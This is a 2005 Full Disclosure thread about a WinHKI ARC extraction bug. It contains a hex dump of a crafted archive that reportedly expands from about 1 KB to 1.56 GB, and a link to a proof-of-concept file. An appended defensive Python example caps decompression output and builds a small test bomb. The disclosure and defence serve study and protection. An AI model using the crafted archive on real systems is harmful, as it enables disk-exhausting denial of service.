Full Disclosure mailing list archives

Re: WinHKI - ARC File Extraction of 1KB to 1.56GB


From: "Rafel Ivgi" <rivgi () finjan com>
Date: Tue, 11 Jan 2005 17:44:40 +0200

The original file wasn't a 1.56 with nulls that were compressed; it was a small file with 1024 FF's which was extracted to a 1.56 of nulls... that is not obvious, that is a bug.

Rafel Ivgi
Security Consultant

----- Original Message -----
From: "bipin gautam" <visitbipin () yahoo com>
To: <full-disclosure () lists netsys com>
Sent: Saturday, January 08, 2005 11:29 AM
Subject: Re: [Full-disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB


That's obvious, isn't it... say... if you create a few GB file with null characters, 0X00, and compress it...... that will produce a similar result. Such an issue has been known in any file compression utility for ages.

Any... software will do the same! Try it. And THAT'S OBVIOUS!
--- "Rafel Ivgi, The-Insider" <theinsider () 012 net il> wrote:


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:    WinHKI
Vendors:        http://www.webtoolmaster.com
Versions:       1.4d
Platforms:      Windows
Bug:            ARC File Extraction of 1KB to 1.56GB
Exploitation:   Local (extract file)
Date:           24 Dec 2004
Author:         Rafel Ivgi, The-Insider
E-Mail:         the_insider () mail com
Website:        http://theinsider.deep-ice.com


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

WinHKI is a file archiver which supports ARC, BH, CAB, HKI, JAR, LHA, TAR and GZ compression.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

This is a normal CAB compressed file header

00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B  ..251.HTM.^^^^^.
00000010 0000 0078 3139 73B5 121B 0000 003C 7363  ...x19s......<sc
00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73  ript.>alert()</s
00000030 6372 6970 743E 0D0A 1A00                 cript>....

By adding a certain amount of chars after the filename header and replacing all nulls (00) with FF (in order to keep our long string from being terminated):

00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF  ..251.HTM.^^^^^.
00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B  ................
00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363  ...x19s......<sc
00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73  ript.>alert()</s
00000430 6372 6970 743E 0D0A 1A00                 cript>....


HKI will create a 1.56 gigabyte file at the selected extract location.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

An online proof of concept can be found at:
http://theinsider.deep-ice.com/hki156gb.ARC


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S, but they will never HACK me."

_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.netsys.com/full-disclosure-charter.html



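Whatever one makes of the "obvious or bug" argument above, the practical defence is the same: an extractor (or a scanner that unpacks archives) should not trust the archive's claim about output size and should stop when extraction exceeds a budget. The following is an added example, not code from the thread or from WinHKI. It uses zlib/DEFLATE as a stand-in for the ARC format (an assumption; the Python standard library has no ARC reader), and `bounded_decompress`, `extraction_allowed`, `build_samples` and `ExtractionLimitExceeded` are names chosen here. The guard combines an absolute output cap with an output/input ratio heuristic, and the constructed bomb reproduces the thread's "few KB in, hundreds of MB out" shape at a smaller scale (8 MiB of zeros).

```python
"""Bounded extraction guard against decompression bombs (added example).

Decompresses incrementally so that at most `max_output` bytes are ever
produced, and optionally aborts once the produced/consumed ratio becomes
implausible. zlib is used as a stand-in for the ARC format (assumption).
"""
import zlib


class ExtractionLimitExceeded(Exception):
    """Raised when extraction would exceed the configured output budget."""


def bounded_decompress(data, max_output, max_ratio=None, chunk=64 * 1024):
    """Decompress `data`, never producing more than `max_output` bytes.

    `max_ratio` (optional) aborts once produced / consumed exceeds it; this is
    a heuristic, while `max_output` is the hard guard. Output is requested in
    `chunk`-sized pieces via max_length, so a tiny input that expands to
    gigabytes is stopped after the first few chunks, not after the fact.
    """
    d = zlib.decompressobj()
    out = bytearray()
    consumed = produced = 0
    pos = 0
    while pos < len(data) or d.unconsumed_tail:
        if d.unconsumed_tail:
            # Input left over from the previous max_length-limited call.
            # It was already counted in `consumed` when first sliced.
            inp = d.unconsumed_tail
        else:
            inp = data[pos:pos + chunk]
            pos += len(inp)
            consumed += len(inp)
        piece = d.decompress(inp, max_length=chunk)
        produced += len(piece)
        if produced > max_output:
            raise ExtractionLimitExceeded(
                f"output exceeded {max_output} bytes after "
                f"consuming only {consumed} input bytes")
        if max_ratio is not None and consumed and produced / consumed > max_ratio:
            raise ExtractionLimitExceeded(
                f"expansion ratio {produced / consumed:.0f}:1 exceeds {max_ratio}:1")
        out += piece
        if d.eof:
            break
    # Anything zlib still holds (at most the tail of the current match).
    tail = d.flush()
    produced += len(tail)
    if produced > max_output:
        raise ExtractionLimitExceeded(f"output exceeded {max_output} bytes")
    out += tail
    return bytes(out)


def extraction_allowed(data, max_output, max_ratio=None):
    """Pre-flight check: True if `data` extracts within the limits."""
    try:
        bounded_decompress(data, max_output, max_ratio)
        return True
    except ExtractionLimitExceeded:
        return False


def build_samples():
    """Constructed inputs (not real archives): a small bomb and a normal file.

    The bomb is 8 MiB of zero bytes, which DEFLATE shrinks to a few KiB,
    the same shape as the thread's 1 KB -> 1.56 GB case at a smaller scale.
    """
    bomb_plain = b"\x00" * (8 * 1024 * 1024)
    bomb = zlib.compress(bomb_plain, 9)
    legit_plain = b"".join(
        b"2005-01-08 extract ok file=%d.htm\n" % i for i in range(20000))
    legit = zlib.compress(legit_plain, 9)
    return bomb, legit_plain, legit


if __name__ == "__main__":
    bomb, legit_plain, legit = build_samples()
    print(f"bomb: {len(bomb)} bytes compressed")
    print("bomb allowed (1 MiB cap):",
          extraction_allowed(bomb, max_output=1024 * 1024))
    print("bomb allowed (16 MiB cap, ratio 100):",
          extraction_allowed(bomb, max_output=16 * 1024 * 1024, max_ratio=100))
    print("legit allowed (4 MiB cap, ratio 100):",
          extraction_allowed(legit, max_output=4 * 1024 * 1024, max_ratio=100))
```

The ratio check is intentionally secondary: a legitimately repetitive file can have a high ratio, so the absolute cap (sized to the free space and memory you are willing to commit) is the limit that actually protects the host, and the ratio is there to fail early and give a useful log message.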

